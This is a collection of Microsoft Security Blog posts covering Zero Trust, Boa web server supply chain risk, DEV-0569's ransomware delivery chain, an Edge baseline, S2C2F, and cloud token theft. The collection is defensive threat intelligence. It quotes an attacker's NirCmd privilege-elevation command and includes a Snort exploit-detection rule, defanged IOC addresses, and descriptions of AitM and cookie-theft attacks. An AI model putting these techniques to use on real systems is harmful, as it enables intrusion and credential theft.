  • Conquest Cyber launched the ARMED™ Platform built on Microsoft Sentinel to help agencies configure and manage solutions to address cyber risk with real-time visibility of their posture, guided by compliance, maturity, and effectiveness.

Lastly, Microsoft is deeply committed to promoting cyber resilience and strengthening our nation’s cyber defenses. This responsibility is demonstrated by our work with the National Institute of Standards and Technology’s (NIST’s) National Cybersecurity Center of Excellence (NCCoE) to develop practical, interoperable Zero Trust approaches and architectures, as well as our continued participation in the Joint Cyber Defense Collaborative established by Cybersecurity & Infrastructure Security Agency (CISA).

Real-world pilots and implementations are driving continuous learning and improvement

Zero Trust philosophy is deeply rooted in lessons learned, and the DoD has embraced this aspect by evaluating ongoing pilots and assessments as a research and development activity. Over the past years, Microsoft has partnered with various departments across the DoD to accelerate Zero Trust adoption through several pilot and production implementations, providing agencies with a predictable path to achieving target objectives.

One such example is the United States Navy’s innovative Flank Speed program, which incorporates key federal and DoD efforts to protect nearly 500,000 identities and devices while improving user experience. The Navy’s large-scale deployment—encompassing components including continuous authorization, big data, and comply-to-connect (C2C)—is already utilizing many of the Zero Trust activities put forth in the DoD’s strategy.

Learn more

Embrace proactive security with Zero Trust.

For more deployment information, tools, and resources as we work together to improve our nation’s cybersecurity, visit the Microsoft cybersecurity for government page.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Microsoft Digital Defense Report 2022, Microsoft. 2022.

2The Cybersecurity Executive Order: What’s Next for Federal Agencies, Jason Payne, Microsoft. June 17, 2021.

3Department of Defense (DoD) Zero Trust Reference Architecture Version 2.0, Defense Information Systems Agency (DISA), National Security Agency (NSA) Zero Trust Engineering Team. July 2022.

4Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. GARTNER and Magic Quadrant are registered trademarks and service marks of Gartner, Inc. and/or its affiliates in the U.S. and internationally and are used herein with permission. All rights reserved.

5Gartner Magic Quadrant for Security Information and Event Management, Pete Shoard, Andrew Davies, Mitchell Schneider, 10 October 2022.

6Gartner Magic Quadrant for Access Management, Henrique Teixeira, Abhyuday Data, Michael Kelly, James Hoover, Brian Guthrie, 1 November 2022.

7Gartner Magic Quadrant for Enterprise Information Archiving, Michael Hoeff, Jeff Vogel, 24 January 2022.

8Gartner Magic Quadrant for Endpoint Protection Platforms, Peter Firstbrook, Dionisio Zumerle, Prateek Bhajanka, Lawrence Pingree, Paul Webber, 5 May 2021.

9Gartner Magic Quadrant for Unified Endpoint Management Tools, Tom Cipolla, Dan Wilson, Chris Silva, Craig Fisler, 1 August 2022.

10The Forrester Wave™: Endpoint Detection And Response Providers, Q2 2022. Allie Mellen. April 2022.

11The Forrester New Wave™: Extended Detection And Response (XDR), Q4 2021. Allie Mellen. October 2021.

12The Forrester Wave™: Security Analytics Platforms, Q4 2020. Joseph Blankenship, Claire O’Malley. December 2020.

13The Forrester Wave™: Enterprise Email Security, Q2 2021. Joseph Blankenship, Claire O’Malley with Stephanie Balaouras, Allie Mellen, Shannon Fish, Peggy Dostie. May 2021.

14The Forrester Wave™: Endpoint Security Software As A Service, Q2 2021. Chris Sherman with Merritt Maxim, Allie Mellen, Shannon Fish, Peggy Dostie. May 2021.

15The Forrester Wave™: Unstructured Data Security Platforms, Q2 2021. Heidi Shey. May 2021.

16The Forrester Wave™: Cloud Security Gateways, Q2 2021. Andras Cser. May 2021.

The post Microsoft supports the DoD’s Zero Trust strategy appeared first on Microsoft Security Blog.

Categories: cybersecurity, Zero Trust Tags:

Join us at InfoSec Jupyterthon 2022

Notebooks are gaining popularity in InfoSec. Used interactively for investigations and hunting or as scheduled processing jobs, notebooks offer plenty of advantages over traditional security operations center (SOC) tools. Sitting somewhere between scripting/macros and a full-blown development environment, they offer easy entry to data analyses and visualizations that are key to modern SOC engagements.

Join our community of analysts and engineers at the third annual InfoSec Jupyterthon 2022, where you’ll meet and engage with security practitioners using notebooks in their daily work. This is an online event taking place on December 2 and 3, 2022. It is organized by our friends at Open Threat Research, together with folks from Microsoft Security research teams and the Microsoft Threat Intelligence Center (MSTIC).

Although this is not a Microsoft event, our Microsoft Security teams are delighted to be involved in helping organize it and deliver talks. Registration is free and it will be streamed on YouTube Live both days from 10:30 AM to 5:00 PM Eastern Time. We’ll also have a dedicated Discord channel for discussions and session Q&A.

Do you have a cool notebook or some interesting techniques or technology to talk about? There are still openings for talks and mini talks (30-minute, 15-minute, and 5-minute sessions).  Submit your proposal here.

For more information, visit the InfoSec Jupyterthon page at:

We’re looking forward to seeing you there!

The post Join us at InfoSec Jupyterthon 2022 appeared first on Microsoft Security Blog.

Vulnerable SDK components lead to supply chain risks in IoT and OT environments

November 22nd, 2022 No comments

Vulnerabilities in network components, architecture files, and developer tools have become increasingly popular attack vectors to gain access into secure networks and devices. External tools and products that are managed by vendors and developers can pose a security risk, especially to targets in sensitive industries. Attacks on software and hardware supply chains, like Log4J and SolarWinds, have highlighted the importance of visibility across device components and proactively securing networks. A report published by Recorded Future in April 2022 detailed suspected electrical grid intrusion activity and implicated common IoT devices as the vector used to gain a foothold into operational technology (OT) networks and deploy malicious payloads. While investigating the attack activity, Microsoft researchers identified a vulnerable component on all the IP addresses published as IOCs and found evidence of a supply chain risk that may affect millions of organizations and devices.

We assessed the vulnerable component to be the Boa web server, which is often used to access settings and management consoles and sign-in screens in devices. Despite being discontinued in 2005, the Boa web server continues to be implemented by different vendors across a variety of IoT devices and popular software development kits (SDKs). Without developers managing the Boa web server, its known vulnerabilities could allow attackers to silently gain access to networks by collecting information from files. Moreover, those affected may be unaware that their devices run services using the discontinued Boa web server, and that firmware updates and downstream patches do not address its known vulnerabilities.

In this blog, we detail the risks affiliated with vulnerable components, highlighting the Boa web server, and how we suspect these components could be exploited to target critical industries. We also discuss the difficulties with identifying these components in device supply chains. To provide comprehensive protection against such attacks, we offer detection information to identify vulnerable components and guidance for organizations and network operators to improve their security posture.

Investigating the attack activity

The attack detailed in the Recorded Future report was one of several intrusion attempts on Indian critical infrastructure since 2020, with the most recent attack on IT assets confirmed in October 2022. Microsoft assesses that Boa servers were running on the IP addresses on the list of IOCs published by Recorded Future at the time of the report’s release and that the electrical grid attack targeted exposed IoT devices running Boa.

Microsoft further identified that half of the IP addresses published by Recorded Future returned suspicious HTTP response headers, which might be associated with the active deployment of the malicious tool identified by Recorded Future. The combination of Boa and suspicious response headers was identified on another set of IP addresses, displaying similar behavior to those found by Recorded Future. While these IP addresses are not confirmed as malicious, we recommend they be monitored to ensure no additional suspicious activity. Users of Microsoft Defender Threat Intelligence will find these IP addresses in the portal labeled as block-listed or suspicious:

  • 122[.]117[.]212[.]65
  • 103[.]58[.]93[.]133
  • 125[.]141[.]38[.]53
  • 14[.]45[.]33[.]239
  • 14[.]55[.]86[.]138
  • 183[.]108[.]133[.]29
  • 183[.]99[.]53[.]180
  • 220[.]94[.]133[.]121
  • 58[.]76[.]177[.]166

Investigating the headers further indicated that over 10% of all active IP addresses returning the headers were related to critical industries, such as the petroleum industry and associated fleet services, with many of the IP addresses associated to IoT devices, such as routers, with unpatched critical vulnerabilities, highlighting an accessible attack vector for malware operators. Most of the suspicious HTTP response headers were returned over a short timeframe of several days, leading researchers to believe they may be associated with intrusion and malicious activity on networks.

Since the report’s publication, Microsoft researchers tracking the published IPs hosts have observed that all IP addresses have been compromised by a variety of attackers employing different malicious methods. For example, some of the IP addresses were further leveraged to download a variant of the Mirai malware family shortly following the report’s release. Microsoft also found evidence that across different devices on the IP addresses, there were attempts to connect with default credentials through brute force methods and attempts to run shell commands. Microsoft continues to see attackers attempting to exploit Boa vulnerabilities beyond the timeframe of the released report, indicating that it is still targeted as an attack vector.

Boa widespread through SDKs

The Boa web server is widely implemented across a variety of devices, including IoT devices ranging from routers to cameras, and is often used to access settings and management consoles as well as sign-in screens. The popularity of Boa web servers is especially concerning as Boa has been formally discontinued since 2005. Data from the Microsoft Defender Threat Intelligence platform identified over 1 million internet-exposed Boa server components around the world over the span of a week, as depicted in the below figure:

Global distribution map displaying exposed Boa web servers over the span of a week.
Figure 1. Global mapping of internet-exposed Boa web servers on devices

Boa web servers remain pervasive in the development of IoT devices, one reason for this could be its inclusion in popular SDKs, which contain essential functions that operate system on chip (SOC) implemented in microchips. Vulnerable components like Boa and SDKs are often distributed to customers within devices, contributing to supply chain vulnerabilities. Popular SDKs like those released by RealTek, are used in SOCs provided to companies that manufacture gateway devices like routers, access points, and repeaters. Critical vulnerabilities such as CVE-2021-35395, which affected the digital administration of devices using RealTek’s SDK, and CVE-2022-27255, a zero-click overflow vulnerability, reportedly affect millions of devices globally and allow attackers to launch code, compromise devices, deploy botnets, and move laterally on networks.

While patches for the RealTek SDK vulnerabilities are available, some vendors may not have included them in their device firmware updates, and the updates do not include patches for Boa vulnerabilities. Boa servers are affected by several known vulnerabilities, including arbitrary file access (CVE-2017-9833) and information disclosure (CVE-2021-33558). These vulnerabilities may allow attackers to execute code remotely after gaining device access by reading the “passwd” file from the device or accessing sensitive URIs in the web server to extract a user’s credentials. Moreover, these vulnerabilities require no authentication to exploit, making them attractive targets.

Boa web servers vulnerable to CVEs from 2017 and 2021 are used in RealTek SDKs that are vulnerable to CVEs from 2021 and 2022. Both of these components are then implemented in RealTek SOCs, which are used routers and similar IoT devices in corporate and manufacturing environments, leaving them vulnerable to unauthorized arbitrary file access and information disclosure.
Figure 2.  The IoT device supply chain demonstrates how vulnerabilities are distributed downstream to organizations and their assets

The popularity of the Boa web server displays the potential exposure risk of an insecure supply chain, even when security best practices are applied to devices in the network. Updating the firmware of IoT devices does not always patch SDKs or specific SOC components and there is limited visibility into components and whether they can be updated. The known CVEs impacting such components can allow an attacker to collect information about network assets before initiating attacks, and to gain access to a network undetected by obtaining valid credentials. In critical infrastructure networks, being able to collect information undetected prior to the attack allows the attackers to have much greater impact once the attack is initiated, potentially disrupting operations that can cost millions of dollars and affect millions of people.


As attackers seek new footholds into increasingly secure devices and networks, identifying and preventing distributed security risks through software and hardware supply chains, like outdated components, should be prioritized by organizations. This case displays the importance of proactive cyber security practices and the need to identify vulnerable components that may be leveraged by attackers.

Microsoft recommends that organizations and network operators follow best practice guidelines for their networks:

  • Patch vulnerable devices whenever possible to reduce exposure risks across your organization.
  • Utilize device discovery and classification to identify devices with vulnerable components by enabling vulnerability assessments, which identifies unpatched devices in the organizational network and set workflows for initiating appropriate patch processes with solutions like Microsoft Defender Vulnerability Management and Microsoft Defender for Endpoint with Microsoft Defender for IoT .
  • Extend vulnerability and risk detection beyond the firewall with platforms like Microsoft Defender External Attack Surface Management. Customers can identify internet-exposed infrastructure running Boa web server components in their inventory and use the insights tile under the Attack Surface Summary dashboard to surface assets vulnerable to CVE-2017-9833. The insight can be found under High Severity Observations.
  • Reduce the attack surface by eliminating unnecessary internet connections to IoT devices in the network. Apply network segmentation to prevent an attacker from moving laterally and compromising assets after intrusion. IoT and critical device networks should be isolated with firewalls.
  • Use proactive antivirus scanning to identify malicious payloads on devices.
  • Configure detection rules to identify malicious activity whenever possible. Security personnel can use our snort rule below to configure security solutions to detect CVE-2022-27255 on assets using the RealTek SDK.
alert udp any any -> any any (msg:"Realtek eCOS SDK SIP Traffic Exploit CVE-2022-27255"; content: "invite"; depth: 6; nocase;  content: "sip:"; content: "m=audio "; isdataat: 128,relative;   content:!"|0d|"; within: 128;sid:20221031;)
  • Adopt a comprehensive IoT and OT solution like Microsoft Defender for IoT to monitor devices, respond to threats, and increase visibility in order to detect and alert when IoT devices with Boa are used as an entry point to a network and protect critical infrastructure. 

Adam Castleman, Jordan Herman, Microsoft Defender Threat Intelligence
Rotem Sde Or, Ilana Sivan, Gil Regev, Microsoft Defender for IoT Research Team
Ross Bevington, Microsoft Threat Intelligence Center

The post Vulnerable SDK components lead to supply chain risks in IoT and OT environments appeared first on Microsoft Security Blog.

Security baseline for Microsoft Edge v107

November 17th, 2022 No comments

Microsoft is pleased to announce the release of the security baseline for Microsoft Edge, version 107!


We have reviewed the settings in Microsoft Edge version 107 and updated our guidance with the addition of one new setting. We’re also highlighting three settings we would like you to consider based on your organizational needs. A new Microsoft Edge security baseline package was just released to the Download Center. You can download the new package from the Security Compliance Toolkit.


Spell checking provided by Microsoft Editor (Consider)

First introduced in Microsoft Edge, version 105. The Microsoft Editor utilizes the power of the cloud for enhanced spell checking for text fields within the browser. This feature securely transmits form data to a Microsoft service in the  cloud, as described in the Microsoft Edge Privacy Whitepaper. While the security baseline does not recommend a setting, customers should consider their own data privacy and security requirements. Further information on this setting can be found here.


Allow local MHTML files to open automatically in Internet Explorer mode (Consider)

Internet Explorer mode will remain a necessary option for the foreseeable future. However, it does come at a security cost. Any vulnerabilities in Internet Explorer will persist into the Internet Explorer mode session within Microsoft Edge. Therefore, if your organization doesn’t require the use of MHTML files, then ensure you stay the most secure by disabling this setting. The security baseline will not yet enforce this setting as we understand many organizations are still in the transformation stage for many legacy applications. Further information on this setting can be found here.


Enhanced Security Mode configuration for Intranet zone sites (Consider)

This setting complements a setting we released in Microsoft Edge, version 98 (Microsoft Edge\Enhance the security state of Microsoft Edge). We still encourage you to test this setting and with the addition of this new Intranet Zone opt-out setting, enterprises now have the granular ability to opt-out Intranet sites making the feature (Enhanced Security Mode) easier to adopt. Further information on this setting can be found here.


Force WebSQL to be enabled (Disable)

WebSQL is a deprecated, non-standard, legacy feature that is destined to be removed from the web platform. The security baseline has explicitly disabled this policy setting; enterprises should plan to update any legacy applications that depend upon WebSQL. Further information on this setting can be found here.


Microsoft Edge version 107 introduced 12 new computer settings and 11 new user settings. We have included a spreadsheet listing the new settings in the release to make it easier for you to find them.


As a friendly reminder, all available settings for Microsoft Edge are documented here, and all available settings for Microsoft Edge Update are documented here.


Please continue to give us feedback through the Security Baseline Community or this post.

Categories: Uncategorized Tags:

DEV-0569 finds new ways to deliver Royal ransomware, various payloads

Recent activity from the threat actor that Microsoft tracks as DEV-0569, known to distribute various payloads, has led to the deployment of the Royal ransomware, which first emerged in September 2022 and is being distributed by multiple threat actors. Observed DEV-0569 attacks show a pattern of continuous innovation, with regular incorporation of new discovery techniques, defense evasion, and various post-compromise payloads, alongside increasing ransomware facilitation.

DEV-0569 notably relies on malvertising, phishing links that point to a malware downloader posing as software installers or updates embedded in spam emails, fake forum pages, and blog comments. In the past few months, Microsoft security researchers observed the following tweaks in the group’s delivery methods:

  • Use of contact forms on targeted organizations’ websites to deliver phishing links
  • Hosting fake installer files on legitimate-looking software download sites and legitimate repositories to make malicious downloads look authentic to targets, and
  • Expansion of their malvertising technique by using Google Ads in one of their campaigns, effectively blending in with normal ad traffic

These methods allow the group to potentially reach more targets and ultimately achieve their goal of deploying various post-compromise payloads. DEV-0569 activity uses signed binaries and delivers encrypted malware payloads. The group, also known to rely heavily on defense evasion techniques, has continued to use the open-source tool Nsudo to attempt disabling antivirus solutions in recent campaigns.

In this blog we share details of DEV-0569’s tactics, techniques, and procedures (TTPs) and observed behavior in recent campaigns, which show that DEV-0569 will likely continue leveraging malvertising and phishing for initial access. We also share preventive measures that organizations can adopt to thwart DEV-0569’s delivery methods involving malicious links and phishing emails using solutions like Microsoft Defender SmartScreen and Microsoft Defender for Office 365, and to reduce the impact of the group’s follow-on activities. Microsoft Defender for Endpoint detects the DEV-0569 behavior discussed in this blog, including the code signing certificates in use and the attempts to disable Microsoft Defender Antivirus.

Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.

DEV-0569 attack chain: Delivery tactics tweaked

DEV-0569 has multiple methods for delivery of their initial payload. In some cases, DEV-0569 payloads are delivered via phishing campaigns run by other malicious actors that offer delivery of malware payloads as a service.

Historical observation of typical DEV-0569 attack begins with malicious links delivered to targets via malicious ads, fake forum pages, blog comments, or through phishing emails. These links lead to malicious files signed by the attacker using a legitimate certificate. The malicious files, which are malware downloaders known as BATLOADER, pose as installers or updates for legitimate applications like Microsoft Teams or Zoom. When launched, BATLOADER uses MSI Custom Actions to launch malicious PowerShell activity or run batch scripts to aid in disabling security solutions and lead to the delivery of various encrypted malware payloads that is decrypted and launched with PowerShell commands.

Posing as legitimate software download sites

From August to October 2022, Microsoft observed DEV-0569 activity where BATLOADER, delivered via malicious links in phishing emails, posed as legitimate installers for numerous applications like TeamViewer, Adobe Flash Player, Zoom, and AnyDesk. BATLOADER was hosted on attacker-created domains posing as legitimate software download sites (anydeskos[.]com, for example) and on legitimate repositories like GitHub and OneDrive. Microsoft takes down verified malicious content from these repositories as they are found or reported.

Screenshot of a BATLOADER landing site that poses as a TeamViewer website hosting a fake installer.

Figure 1. DEV-0569 activity seen in September 2022, where the landing site hosted BATLOADER posing as a TeamViewer installer

Use of VHD file formats

Aside from using installer files, Microsoft has also observed the use of file formats like Virtual Hard Disk (VHD) impersonating legitimate software for first-stage payloads. These VHDs also contain malicious scripts that lead to the download of DEV-0569’s malware payloads.

PowerShell and batch scripts for downloading

DEV-0569 has used varied infection chains using PowerShell and batch scripts that ultimately led to the download of malware payloads like information stealers or a legitimate remote management tool used for persistence on the network. The management tool can also be an access point for the staging and spread of ransomware.

NSudo to disable antivirus solutions

DEV-0569 also continues to tamper with antivirus products. In September and October 2022, Microsoft saw activity where DEV-0569 used the open-source NSudo tool to attempt disabling antivirus solutions.  

This diagram illustrates a typical DEV-0569 infection chain. It illustrates some of the observed tweaks in recent campaigns.

 Figure 2. High-level view of observed DEV-0569 infection chains between August to October 2022

September 2022: Adopting contact forms to gain access to targets and deliver information stealers

In September 2022, Microsoft observed a campaign using contact forms to deliver DEV-0569 payloads. Using contact forms on public websites to distribute malware has been seen in other campaigns, including IcedID malware. Attackers use this technique as a defense evasion method since contact forms can bypass email protections and appear trustworthy to the recipient.

In this campaign, DEV-0569 sent a message to targets using the contact form on these targets’ websites, posing as a national financial authority. When a contacted target responds via email, DEV-0569 replied with a message that contained a link to BATLOADER. Microsoft Defender for Office 365 detects the spoofing behavior as well as the malicious links in these emails.

The malicious links in the contact forms led to BATLOADER malware hosted on abused web services like GitHub and OneDrive. The installers launched a PowerShell script that issued multiple commands, including downloading a NirCmd command-line utility provided by freeware developer NirSoft:

nircmd elevatecmd exec hide "requestadmin.bat"

If successful, the command allows the attacker to elevate from local admin to SYSTEM rights, similar to executing a scheduled task as SYSTEM.

The PowerShell script also delivered additional executables from a remote website (e.g., updateea1[.]com), including an AES-encrypted Gozi banking trojan and the information stealer known as Vidar Stealer, which used Telegram to receive command and control (C2) information. DEV-0569 frequently diversifies their payloads and has shifted from delivering ZLoader at the beginning of 2022, possibly in response to disruption efforts against Zloader in April 2022.

September 2022: Deploying Royal ransomware

Microsoft identified instances involving DEV-0569 infection chains that ultimately facilitated human-operated ransomware attacks distributing Royal ransomware. Based on tactics observed by Microsoft, ransomware attackers likely gained access to compromised networks via a BATLOADER-delivered Cobalt Strike Beacon implant.

DEV-0569’s widespread infection base and diverse payloads likely make the group an attractive access broker for ransomware operators.

October 2022: Leveraging Google Ads to deliver BATLOADER selectively

In late October 2022, Microsoft researchers identified a DEV-0569 malvertising campaign leveraging Google Ads that point to the legitimate traffic distribution system (TDS) Keitaro, which provides capabilities to customize advertising campaigns via tracking ad traffic and user- or device-based filtering. Microsoft observed that the TDS redirects the user to a legitimate download site, or under certain conditions, to the malicious BATLOADER download site. Microsoft reported this abuse to Google for awareness and consideration for action.

Using Keitaro, DEV-0569 can use traffic filtering provided by Keitaro to deliver their payloads to specified IP ranges and targets. This traffic filtering can also aid DEV-0569 in avoiding IP ranges of known security sandboxing solutions.

Defending against DEV-0569

DEV-0569 will likely continue to rely on malvertising and phishing to deliver malware payloads. Solutions such as network protection and Microsoft Defender SmartScreen can help thwart malicious link access. Microsoft Defender for Office 365 helps guard against phishing by inspecting the email body and URL for known patterns. Since DEV-0569’s phishing scheme abuses legitimate services, organizations can also leverage mail flow rules to capture suspicious keywords or review broad exceptions, such as those related to IP ranges and domain-level allow lists. Enabling Safe Links for emails, Microsoft Teams, and Office Apps can also help address this threat.

Defenders can also apply the following mitigations to reduce the impact of this threat:

  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protection to block connections to malicious domains and IP addresses.
  • Build organizational resilience against email threats by educating users about identifying social engineering attacks and preventing malware infection. Use Attack simulation training in Microsoft Defender for Office 365 to run attack scenarios, increase user awareness, and empower employees to recognize and report these attacks.
  • Practice the principle of least-privilege and maintain credential hygiene. Avoid the use of domain-wide, admin-level service accounts. Restricting local administrative privileges can help limit installation of RATs and other unwanted applications.
  • Turn on cloud-delivered protection and automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Turn on tamper protection features to prevent attackers from stopping security services.

Microsoft Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:

Detection details

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

NSudo activity is detected by the tamper protection capability as:

  • Nsudo file drop
  • Nsudo runtime
  • Nsudo AV tampering commandline

Microsoft Defender for Endpoint

Alerts with the following titles in the security center can indicate threat activity on your network:

  • Ransomware-linked DEV-0569 activity group

While the following alerts might indicate activity associated with this threat, they could also be triggered by unrelated threat activity:

  • Ransomware-linked DEV-0858 activity group
  • Cobalt Strike activity detected
  • Cobalt Strike activity observed
  • Cobalt Strike artifact observed
  • Cobalt Strike attack tool
  • Cobalt strike named pipes
  • ‘Vidar’ credential theft malware was detected
  • ‘VidarStealer’ malware was detected
  • ‘Gozi’ malware was detected
  • An active ‘Nsudo’ hacktool in a command line was detected while executing
  • An active ‘NSudo’ hacktool process was detected while executing

The post DEV-0569 finds new ways to deliver Royal ransomware, various payloads appeared first on Microsoft Security Blog.

Announcing the Microsoft Machine Learning Membership Inference Competition (MICO)

November 16th, 2022 No comments

We’re excited to announce the launch of a new competition focusing on the security and privacy of machine learning (ML) systems. Machine learning has already become a key enabler in many products and services, and this trend is likely to continue. It is therefore critical to understand the security and privacy guarantees provided by state-of-the-art …

Announcing the Microsoft Machine Learning Membership Inference Competition (MICO) Read More »

Microsoft contributes S2C2F to OpenSSF to improve supply chain security

November 16th, 2022 No comments

On August 4, 2022, Microsoft publicly shared a framework that it has been using to secure its own development practices since 2019, the Secure Supply Chain Consumption Framework (S2C2F), previously the Open Source Software-Supply Chain Security (OSS-SSC) Framework. As a massive consumer of and contributor to open source, Microsoft understands the importance of a robust strategy around securing how developers consume and manage open source software (OSS) dependencies when building software. We are pleased to announce that the S2C2F has been adopted by the OpenSSF under the Supply Chain Integrity Working Group and formed into its own Special Initiative Group (SIG). Our peers at the OpenSSF and across the globe agree with Microsoft when it comes to how fundamental this work is to improving supply chain security for everyone.

What is the S2C2F?

We built the S2C2F as a consumption-focused framework that uses a threat-based, risk-reduction approach to mitigate real-world threats. One of its primary strengths is how well it pairs with any producer-focused framework, such as SLSA.1 The framework enumerates a list of real-world supply chain threats specific to OSS and explains how the framework’s requirements mitigate those threats. It also includes a high-level platform- and software-agnostic set of focuses that are divided into eight different areas of practice:

Sunburst chart conveying the eight areas of practice requirements to address the threats and reduce risk: ingest, inventory, update, enforce, audit, scan, rebuild, and fix and upstream.

Each of the eight practices are comprised of requirements to address the threats and reduce risk. The requirements are organized into four levels of maturity. We have seen massive success with both internal and external projects who have adopted this framework. Using the S2C2F, teams and organizations can more efficiently prioritize their efforts in accordance with the maturity model. The ability to target a specific level of compliance within the framework means teams can make intentional and incremental progress toward reducing their supply chain risk.

Each maturity level has a theme represented in Levels (1 to 4). Level 1 represents the previous conventional wisdom of inventorying your OSS, scanning for known vulnerabilities, and then updating OSS dependencies, which is the minimum necessary for an OSS governance program. Level 2 builds upon Level 1 by leveraging technology that helps improve your mean time to remediate (MTTR) vulnerabilities in OSS with the goal of patching faster than the adversary can operate. Level 3 is focused on proactive security analysis combined with preventative controls that mitigate against accidental consumption of compromised or malicious OSS. Level 4 represents controls that mitigate against the most sophisticated attacks but are also the controls that are the most difficult to implement at scale—therefore, these should be considered aspirational and reserved for your dependencies in your most critical projects.

The S2C2F has four levels of maturity. Level 1: running a minimum OSS governance program. Level 2: improving MTTR vulnerabilities. Level 3: adding defenses from compromised OSS. Level 4: mitigating against the most sophisticated adversaries.

The S2C2F includes a guide to assess your organization’s maturity, and an implementation guide that recommends tools from across the industry to help meet the framework requirements. For example, both GitHub Advanced Security (GHAS) and GHAS on Azure DevOps (ADO) already provide a suite of security tools that will help teams and organizations achieve S2C2F Level 2 compliance.

The S2C2F is critical to the future of supply chain security

According to Sonatype’s 2022 State of the Software Supply Chain report,2 supply chain attacks specifically targeting OSS have increased by 742 percent annually over the past three years. The S2C2F is designed from the ground up to protect developers from accidentally consuming malicious and compromised packages helping to mitigate supply chain attacks by decreasing consumption-based attack surfaces. As new threats emerge, the OpenSSF S2C2F SIG under the Supply Chain Integrity Working Group, led by a team from Microsoft, is committed to reviewing and maintaining the set of S2C2F requirements to address them.

Learn more

View the S2C2F requirements or download the guide now to see how you can improve the security of your OSS consumption practices in your team or organization. Come join the S2C2F community discussion within the OpenSSF Supply Chain Integrity Working Group.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

1Supply chain Levels for Software Artifacts (SLSA).

28th Annual State of the Software Supply Chain Report, Sonatype.

The post Microsoft contributes S2C2F to OpenSSF to improve supply chain security appeared first on Microsoft Security Blog.

Token tactics: How to prevent, detect, and respond to cloud token theft

November 16th, 2022 No comments

As organizations increase their coverage of multifactor authentication (MFA), threat actors have begun to move to more sophisticated techniques to allow them to compromise corporate resources without needing to satisfy MFA. Recently, the Microsoft Detection and Response Team (DART) has seen an increase in attackers utilizing token theft for this purpose. By compromising and replaying a token issued to an identity that has already completed multifactor authentication, the threat actor satisfies the validation of MFA and access is granted to organizational resources accordingly. This poses to be a concerning tactic for defenders because the expertise needed to compromise a token is very low, is hard to detect, and few organizations have token theft mitigations in their incident response plan.

Why it matters

In the new world of hybrid work, users may be accessing corporate resources from personally owned or unmanaged devices which increases the risk of token theft occurring. These unmanaged devices likely have weaker security controls than those that are managed by organizations, and most importantly, are not visible to corporate IT. Users on these devices may be signed into both personal websites and corporate applications at the same time, allowing attackers to compromise tokens belonging to both.

As far as mitigations go, publicly available open-source tools for exploiting token theft already exist, and commodity credential theft malware has already been adapted to include this technique in their arsenal. Detecting token theft can be difficult without the proper safeguards and visibility into authentication endpoints. Microsoft DART aims to provide defenders with the knowledge and strategies necessary to mitigate this tactic until permanent solutions become available.

Tokens are at the center of OAuth 2.0 identity platforms, such as Azure Active Directory (Azure AD). To access a resource (for example, a web application protected by Azure AD), a user must present a valid token. To obtain that token, the user must sign into Azure AD using their credentials. At that point, depending on policy, they may be required to complete MFA. The user then presents that token to the web application, which validates the token and allows the user access.

Flowchart for Azure Active Directory issuing tokens.
Figure 1. OAuth Token flow chart

When Azure AD issues a token, it contains information (claims) such as the username, source IP address, MFA, and more. It also includes any privilege a user has in Azure AD. If you sign in as a Global Administrator to your Azure AD tenant, then the token will reflect that. Two of the most common token theft techniques DART has observed have been through adversary-in-the-middle (AitM) frameworks or the utilization of commodity malware (which enables a ‘pass-the-cookie’ scenario).

With traditional credential phishing, the attacker may use the credentials they have compromised to try and sign in to Azure AD. If the security policy requires MFA, the attacker is halted from being able to successfully sign in. Though the users’ credentials were compromised in this attack, the threat actor is prevented from accessing organizational resources.

Flowchart describing how credential phishing attacks are mitigated by multifactor authentication.
Figure 2. Common credential phishing attack mitigated by MFA

Adversary-in-the-middle (AitM) phishing attack

Attacker methodologies are always evolving, and to that end DART has seen an increase in attackers using AitM techniques to steal tokens instead of passwords. Frameworks like Evilginx2 go far beyond credential phishing, by inserting malicious infrastructure between the user and the legitimate application the user is trying to access. When the user is phished, the malicious infrastructure captures both the credentials of the user, and the token.

Flowchart describing how an adversary in the middle attack works.
Figure 3. Adversary-in-the-middle (AitM) attack flowchart

If a regular user is phished and their token stolen, the attacker may attempt business email compromise (BEC) for financial gain. If a token with Global Administrator privilege is stolen, then they may attempt to take over the Azure AD tenant entirely, resulting in loss of administrative control and total tenant compromise.

Pass-the-cookie attack

A “pass-the-cookie” attack is a type of attack where an attacker can bypass authentication controls by compromising browser cookies. At a high level, browser cookies allow web applications to store user authentication information. This allows a website to keep you signed in and not constantly prompt for credentials every time you click a new page.

“Pass-the-cookie” is like pass-the-hash or pass-the-ticket attacks in Active Directory. After authentication to Azure AD via a browser, a cookie is created and stored for that session. If an attacker can compromise a device and extract the browser cookies, they could pass that cookie into a separate web browser on another system, bypassing security checkpoints along the way. Users who are accessing corporate resources on personal devices are especially at risk. Personal devices often have weaker security controls than corporate-managed devices and IT staff lack visibility to those devices to determine compromise. They also have additional attack vectors, such as personal email addresses or social media accounts users may access on the same device. Attackers can compromise these systems and steal the authentication cookies associated with both personal accounts and the users’ corporate credentials.

Flowchart describing how pass-the-cookie attack works
Figure 4. Pass-the-cookie attack flowchart

Commodity credential theft malware like Emotet, Redline, IcedID, and more all have built-in functionality to extract and exfiltrate browser cookies. Additionally, the attacker does not have to know the compromised account password or even the email address for this to work those details are held within the cookie.



